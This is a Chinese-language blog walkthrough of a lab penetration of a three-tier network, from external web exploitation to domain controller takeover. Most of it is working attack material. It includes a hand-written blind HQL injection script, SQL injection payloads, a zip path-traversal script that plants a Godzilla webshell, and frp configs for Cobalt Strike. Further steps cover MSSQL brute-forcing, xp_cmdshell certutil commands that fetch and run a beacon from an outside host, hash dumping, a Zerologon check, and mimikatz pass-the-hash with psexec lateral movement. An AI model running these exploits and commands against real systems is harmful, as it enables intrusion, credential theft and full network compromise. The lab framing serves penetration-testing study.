三层内网外网打点到内网

admin

138635
文章

114
评论

2024年5月8日14:23:53评论42 views字数 12839阅读42分47秒阅读模式

最近由于客户内部的攻防演练，一直忙于工作，五一放假，更新一期关于三层内网的打靶记录，下期更新关于这一期失陷资产的应急响应的记录。

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1.项目介绍

本次项目模拟渗透测试人员在授权的情况下，对目标进行渗透测试，从外网打点到内网横向渗透，最终获取整个内网权限。本次项目属于三层代理内网穿透，会学习到各种内网穿透技术，cobalt strike在内网中各种横行方法，也会学习到在工具利用失败的情况下，手写exp获取边界突破点进入内网，详细介绍外网各种打点方法,学习到行业流行的内网渗透测试办法，对个人提升很有帮助。

2.账号密码

主机名	IP	账号和密码
web1	192.168.211.99	administrator QWEasd123
server2012	192.168.211.152 10.10.10.136	adninistrator QWEadmin555 sec123cnk QWEasd789
ad01	10.10.10.128	sec123administrator QWEadmin001

3.网络配置图

以下是网络拓扑图详细的标注了各个主机名和ip 在渗透测试进行针对性操作。

三层内网外网打点到内网

本靶场模拟在实战环境，所以要将web1主机映射到公网上，需要一台公网的vps 去淘宝购买一台即可。

映射后成功访问：http://101.34.69.139:8878/login.jsp

三层内网外网打点到内网

4.外网打点

4.1端口探测

masscan -p 1-65535 101.34.69.139 --rate=100 Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-04-30 17:08:09 GMTInitiating SYN Stealth ScanScanning 1 hosts [65535 ports/host]Discovered open port 110/tcp on 101.34.69.139                                  Discovered open port 3389/tcp on 101.34.69.139                                 Discovered open port 49671/tcp on 101.34.69.139                                Discovered open port 8088/tcp on 101.34.69.139                                 Discovered open port 49674/tcp on 101.34.69.139                                Discovered open port 49690/tcp on 101.34.69.139                                Discovered open port 49664/tcp on 101.34.69.139                                Discovered open port 25/tcp on 101.34.69.139                                   Discovered open port 7000/tcp on 101.34.69.139                                 Discovered open port 5985/tcp on 101.34.69.139                                 Discovered open port 49666/tcp on 101.34.69.139                                Discovered open port 8878/tcp on 101.34.69.139                                 Discovered open port 8899/tcp on 101.34.69.139                                 Discovered open port 49665/tcp on 101.34.69.139                                Discovered open port 47001/tcp on 101.34.69.139nmap -sV 101.34.69.139 -sC -p 8088,5985,49154,49173,80,8878,47001,7000,49153,49157,3389,49155,49152,8899,49161 -oN sec-portsStarting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-01 01:09 CSTNmap scan report for 101.34.69.139Host is up (0.049s latency).PORT      STATE    SERVICE          VERSION80/tcp    filtered http3389/tcp  open     ms-wbt-server    Microsoft Terminal Services5985/tcp  open     http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found|_http-server-header: Microsoft-HTTPAPI/2.07000/tcp  open     afs3-fileserver?|_irc-info: Unable to open connection8088/tcp  open     http             Apache Tomcat 8.5.768878/tcp  open     http             Apache Tomcat 8.5.7647001/tcp open     http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found|_http-server-header: Microsoft-HTTPAPI/2.049152/tcp filtered unknown49153/tcp filtered unknown49154/tcp filtered unknown49155/tcp filtered unknown49157/tcp filtered unknown49161/tcp filtered unknown49173/tcp filtered unknown

4.2网站类型

通过端口探测获取以下网站

网址	cms
http://101.34.69.139:8088/login.jsp	TomExam
http://101.34.69.139:8878/login.jsp	网上银行系统
http://101.34.69.139:8899/	jsxcms

4.3.网上银行系统漏洞

经过一段时间收集发现 https://github.com/amateur-RD/netBank-System 是这套源码

三层内网外网打点到内网

普通账号登录成功，管理账号登录失败。

4.4网上银行系统Hsql注入漏洞

admin' or '1'='1 密码不正确admin' or '1'='2 用户名不存在

返回的信息不一样证明存在SQL注入，但是Hibernate4的注入SQLMAP是检测失败的。

sqlmap -r sql.txt --dbms mysql -v

三层内网外网打点到内网

4.5编写HQL注入exp

#coding:utf-8import requestspassword=""url="http://101.34.69.139:8878/admin/login"payload="0123456789abcdefghijklmnopqrstuvwxyz"password=""for i in range(1,20):  for j in payload:    exp = "admin' and(select substring(password,%s,1) from Admin) like '%s'or '1'='" %(i,j)    print("正在注入")    data = {"admin.username": exp, "admin.password": 'aaaa', "type": 1}    req = requests.post(url=url, data=data);    if "密码不正确" in req.text:      password+=j      print(password)      breakprint(password)

跑出密码adminsec123后后然后进行登录

三层内网外网打点到内网

登录之后，寻找文件上传或者可以获取到webshell的地方，发现没有可利用点。

三层内网外网打点到内网

4.6.tomexam SQL注入漏洞

在另一个地址处，发现可以注册用户。然后注册用户进行登录。

三层内网外网打点到内网

这是一个tomexam登录系统年份比较久远。试过弱口令后无果，注册用户登录后发现存在SQL注入

GET /page.do?action=comm_news&act=list&classid=1 HTTP/1.1Host: 101.34.69.139:8088Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: _jspxcms=3d4ba33c9dfe44c88716325ad1a14c8b; JSESSIONID=3BAF8E4AE8A449DA05D8B0BA95559F2DConnection: close

[*] bank[*] information_schema[*] jspxcms[*] mysql[*] performance_schema[*] sys[*] tomexam

通过SQL注入获取账号和密码

三层内网外网打点到内网

解密的到密码 moonsec123 登录后台无法getshell

4.7.mysql跨库查询

使用sqlmap无法跨库查询，经过手工测试将hex函数进入查询内容可以获取指定的内容

http://101.34.69.139:8088/action=comm_news&act=list&classid=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a706a71,0x465559697478496b4143484d6d686d796e526c4770695366795741526c5846664549487771594f6c,0x717a716a71),NULL,NULL,NULL,NULL,NULL--%20-

得到得密文再进行hex转换

admin 51c52ae56562d8c538600385909595b009467f0b 9b2b38ad7cb62fd9

4.8.编写jspxcms密文加密脚本进行破解

获取的明文是不能直接解密的 jspxcms 登录是sha1('明文',salt)加密

package com.jspxcms.core;import com.jspxcms.common.security.SHA1CredentialsDigest;import com.jspxcms.common.util.Encodes;import java.io.File;import java.io.FileReader;import java.io.FileWriter;import java.io.PrintWriter;import java.util.Scanner;public class Testmain {public static void main(String[] args)throws Exception {byte[] salt = Encodes.decodeHex("9b2b38ad7cb62fd9");SHA1CredentialsDigest test = new SHA1CredentialsDigest();String fileName = "D:\csdnpass.txt";String fileName2 = "D:\hashpassword2.txt";try (Scanner sc = new Scanner(new FileReader(fileName))) {while (sc.hasNextLine()) {String line = sc.nextLine();String encPass = test.digest(line, salt);File f = new File(fileName2);FileWriter fw = new FileWriter(f, true);PrintWriter pw = new PrintWriter(fw);pw.println(line + " " + encPass);pw.close();}}}}

经过半个小时的生成的密文再进行明文查找

三层内网外网打点到内网

4.9.登录jspxcms后台getshell

使用哥斯拉生成一个god.jsp 然后打包成war,由于主机java环境的问题，用虚拟机生成的war包

jar -cf m.war m.jsp

三层内网外网打点到内网

制作目录穿越脚本

import zipfilezip = zipfile.ZipFile("test.zip",'w',zipfile.ZIP_DEFLATED)with open("m.war","rb") as f:  data=f.read();zip.writestr("../../../m.war",data)zip.close()

在后台找个zip上传上传后会自动解压到网站目录 tomcat会自动解压改文件

三层内网外网打点到内网

http://101.34.69.139:8899/m/m.jsp

使用哥斯拉进行连接至此可以获取一个webshell的权限了。

三层内网外网打点到内网

5.内网渗透

5.1 配置内网cobalt strike内网上线

因为测试者本身处于内网，cobalt stike也在于内网所以首先让后门能够内网上线。需要一台外网的vps做frp 反向代理出去。

外网 vps frps.ini

[common]bind_port = 7000token=hk123

kali frpc.ini

[common]server_addr = 114.55.119.127server_port = 7000token = hk123[msf]type = tcplocal_ip = 127.0.0.1local_port = 6666remote_port = 6666[cs]type = tcplocal_ip = 127.0.0.1local_port = 7777remote_port = 7777[socks_proxy]type = tcpremote_port = 8888plugin = socks5

启动teamsever

sudo nohup ./teamserver 192.168.10.91 123

三层内网外网打点到内网

生成Windows后门文件

三层内网外网打点到内网

哥斯拉上传后门文件，并执行。

三层内网外网打点到内网

上传到目标上，并执行命令，目标即可上线。

三层内网外网打点到内网

5.2 内网横行信息收集

三层内网外网打点到内网

5.3cobalt stike开启代理与nmap端口探测

使用cs的端口扫描是非常缓慢的，如果还需要对端口进行探测最好在cs上开启代理，再设置 proxychains4代理nmap进行内网扫描 beacon上执行命令 socks 端口再编辑 kali上的 /etc/proxychains4.conf文件

sudo vi /etc/proxychains4.confsocks4 127.0.0.1 3114

┌──(root㉿192)-[~]└─# proxychains4 nmap -sT -Pn 192.168.211.152 -p 445,80,135,8080,53,3306,1433,5900 --open[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.17Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-06 01:40 CST[proxychains] Strict chain  ...  127.0.0.1:1234  ...  192.168.211.152:8080 <--denied[proxychains] Strict chain  ...  127.0.0.1:1234  ...  192.168.211.152:53 <--denied[proxychains] Strict chain  ...  127.0.0.1:1234  ...  192.168.211.152:445  ...  OK[proxychains] Strict chain  ...  127.0.0.1:1234  ...  192.168.211.152:135  ...  OK[proxychains] Strict chain  ...  127.0.0.1:1234  ...  192.168.211.152:80 <--denied[proxychains] Strict chain  ...  127.0.0.1:1234  ...  192.168.211.152:3306 <--denied[proxychains] Strict chain  ...  127.0.0.1:1234  ...  192.168.211.152:5900 <--denied[proxychains] Strict chain  ...  127.0.0.1:1234  ...  192.168.211.152:1433  ...  OKNmap scan report for 192.168.211.152Host is up (1.5s latency).Not shown: 5 closed tcp ports (conn-refused)PORT     STATE SERVICE135/tcp  open  msrpc445/tcp  open  microsoft-ds1433/tcp open  ms-sql-sNmap done: 1 IP address (1 host up) scanned in 13.11 seconds

5.4.hydra对内网进行弱口令穷举

proxychains4 hydra -l sa -P password.txt 192.168.211.152 mssql -vV -f

三层内网外网打点到内网

5.5.mssqlclient 登录执行命令

 python mssqlclient.py sa@192.168.211.152Impacket v0.11.0 - Copyright 2023 FortraPassword:[*] Encryption required, switching to TLS[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: 简体中文[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192[*] INFO(SERVER2012): Line 1: 已将数据库上下文更改为 'master'。[*] INFO(SERVER2012): Line 1: 已将语言设置更改为 简体中文。[*] ACK: Result: 1 - Microsoft SQL Server (110 1256) [!] Press help for extra shell commandsSQL> help     lcd {path}                 - changes the current local directory to {path}     exit                       - terminates the server process (and this session)     enable_xp_cmdshell         - you know what it means     disable_xp_cmdshell        - you know what it means     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)     ! {cmd}                    - executes a local shell cmdSQL> enable_xp_cmdshell[*] INFO(SERVER2012): Line 185: 配置选项 'show advanced options' 已从 1 更改为 1。请运行 RECONFIGURE 语句进行安装。[*] INFO(SERVER2012): Line 185: 配置选项 'xp_cmdshell' 已从 1 更改为 1。请运行 RECONFIGURE 语句进行安装。SQL> whoami[-] ERROR(SERVER2012): Line 1: 找不到存储过程 'whoami'。SQL> xp_cmdshell whoamioutput                   ----------------------   nt servicemssqlserver

执行命令远程下载exe并且执行得到server2012权限mssql用户得权限

xp_cmdshell certutil -urlcache -split -f http://101.34.69.139/artifact.exec:/windows/temp/artifact.exexp_cmdshell c:/windows/temp/artifact.exe

三层内网外网打点到内网

5.5.利用CS插件进行提权，成功提权到system权限

三层内网外网打点到内网

6.内网域渗透

[05/07 22:02:11] beacon> hashdump[05/07 22:02:11] [*] Tasked beacon to dump hashes[05/07 22:03:05] [+] host called home, sent: 82541 bytes[05/07 22:03:06] [+] received password hashes:Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbb228c4d6ceeea0590a5e4a45b1572c:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[05/07 22:04:05] beacon> shell ipconfig[05/07 22:04:05] [*] Tasked beacon to run: ipconfig[05/07 22:04:06] [+] host called home, sent: 39 bytes[05/07 22:04:06] [+] received output:Windows IP 配置以太网适配器 Ethernet0:   连接特定的 DNS 后缀 . . . . . . . :    本地链接 IPv6 地址. . . . . . . . : fe80::d43b:bd4a:b226:e6ff%13   IPv4 地址 . . . . . . . . . . . . : 192.168.211.152   子网掩码  . . . . . . . . . . . . : 255.255.255.0   默认网关. . . . . . . . . . . . . : 192.168.211.2以太网适配器 Ethernet1:   连接特定的 DNS 后缀 . . . . . . . :    本地链接 IPv6 地址. . . . . . . . : fe80::889b:2cb3:dea2:8955%12   IPv4 地址 . . . . . . . . . . . . : 10.10.10.136   子网掩码  . . . . . . . . . . . . : 255.255.255.0   默认网关. . . . . . . . . . . . . : 隧道适配器 isatap.{DA985524-EF35-49FE-AEBA-7DA955A2E827}:   媒体状态  . . . . . . . . . . . . : 媒体已断开   连接特定的 DNS 后缀 . . . . . . . : 隧道适配器 isatap.{02FE46CD-303B-4117-9B93-884088B66D31}:   媒体状态  . . . . . . . . . . . . : 媒体已断开   连接特定的 DNS 后缀 . . . . . . . : [05/07 22:04:25] beacon> net dcliist[05/07 22:04:25] [-] net error: argument 'dcliist' is not a net command[05/07 22:04:41] beacon> shell net dclist[05/07 22:04:41] [*] Tasked beacon to run: net dclist[05/07 22:05:06] [+] host called home, sent: 41 bytes[05/07 22:05:06] [+] received output:此命令的语法是:NET    [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |      HELPMSG | LOCALGROUP | PAUSE | SESSION | SHARE | START |      STATISTICS | STOP | TIME | USE | USER | VIEW ][05/07 22:05:10] beacon> net dclist[05/07 22:05:10] [*] Tasked beacon to run net dclist[05/07 22:06:06] [+] host called home, sent: 105059 bytes[05/07 22:06:08] [+] received output:DCs:[05/07 22:07:08] [+] received output: Server Name             IP Address                       Platform  Version  Type   Comment -----------             ----------                       --------  -------  ----   ------- AD01                    10.10.10.128                     500       6.3      PDC

发现进程也存在域普通用户注入进程得到sec123/cnk用户权限

三层内网外网打点到内网

7.CVE-2020-1472 获取域控权限

下载 https://github.com/leitosama/SharpZeroLogon 进行编译执行测试存在该漏洞 execute-assembly SharpZeroLogon.exe ad01.sec123.cnk

beacon> execute-assembly SharpZeroLogon.exe ad01.sec123.cnk[*] Tasked beacon to run .NET program: SharpZeroLogon.exe ad01.sec123.cnk[+] host called home, sent: 114761 bytes[+] received output:Performing authentication attempts...=======================================================================================[+] received output:===Success! DC can be fully compromised by a Zerologon attack.xxxxxxxxxx beacon>execute-assembly SharpZeroLogon.exe ad01.sec123.cnk[*] Tasked beacon to run .NETprogram: SharpZeroLogon.exe ad01.sec123.cnk[+] host called home, sent: 114761bytes[+] received output:Performing authenticationattempts...=======================================================================================[+] received output:===Success! DC can be fully compromised bya Zerologon attack.execute-assembly SharpZeroLogon.exe ad01.sec123.cnk

 beacon> pth sec123administrator 81220c729f6ccb63d782a77007550f74[05/08 01:36:59] [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:"administrator" /domain:"sec123" /ntlm:81220c729f6ccb63d782a77007550f74 /run:"%COMSPEC% /c echo 978cd6aa84e > \.pipebf58d2" command[05/08 01:36:59] [+] host called home, sent: 312974 bytes[05/08 01:37:04] [+] Impersonated sec123administrator[05/08 01:37:04] [+] received output:user  : administratordomain  : sec123program  : C:Windowssystem32cmd.exe /c echo 978cd6aa84e > \.pipebf58d2impers.  : noNTLM  : 81220c729f6ccb63d782a77007550f74  |  PID  276  |  TID  2544  |  LSA Process is now R/W  |  LUID 0 ; 1824650 (00000000:001bd78a)  _ msv1_0   - data copy @ 000000BCE8DBABC0 : OK !  _ kerberos - data copy @ 000000BCE8D43958   _ aes256_hmac       -> null                _ aes128_hmac       -> null                _ rc4_hmac_nt       OK   _ rc4_hmac_old      OK   _ rc4_md4           OK   _ rc4_hmac_nt_exp   OK   _ rc4_hmac_old_exp  OK   _ *Password replace @ 000000BCE8D8D8F8 (16) -> null[05/08 01:39:30] beacon> jump psexec64 10.10.10.139[05/08 01:39:34] [*] Tasked beacon to run windows/beacon_bind_tcp (0.0.0.0:6677) on 10.10.10.139 via Service Control Manager (\10.10.10.139ADMIN$600cf6d.exe)[05/08 01:39:34] [+] host called home, sent: 318754 bytes[05/08 01:39:37] [+] received output:Started service 600cf6d on 10.10.10.139[05/08 01:39:37] [+] host called home, sent: 23 bytes[05/08 01:39:37] [+] established link to child beacon: 10.10.10.139[05/08 01:39:37] beacon> sleep 0 [from: Beacon 10.10.10.139@3792][05/08 01:39:37] [*] Tasked beacon to become interactive[05/08 01:39:37] [+] host called home, sent: 28 bytes

三层内网外网打点到内网

8.总结

用到的时候渗透测试常规的流程，从外网打点到内网域渗透，过程涉及的知识众多，有不明白的可以随时私信，有需要靶场的也可以私信。

原文始发于微信公众号（网安一零一）：三层内网外网打点到内网

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

三层内网外网打点到内网

4.6.tomexam SQL注入漏洞

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

Webshell免杀思路-PHP篇-1：经典混淆的艺术

CimFS：内存崩溃，查找系统（内核版）

Astral-PE 是用于本机 Windows PE 文件（x32/x64）的低级变异器（Headers/EP 混淆器）

【通俗易懂说AI】MCP如何安装以及使用

深入解析 URL 跳转漏洞：审计方法与渗透实战全攻略

记一次前端js加解密泄露引发的漏洞

一文吃透文件上传漏洞！路径遍历、后缀绕过、ZIP炸弹全解析

发表评论

在线咨询

微信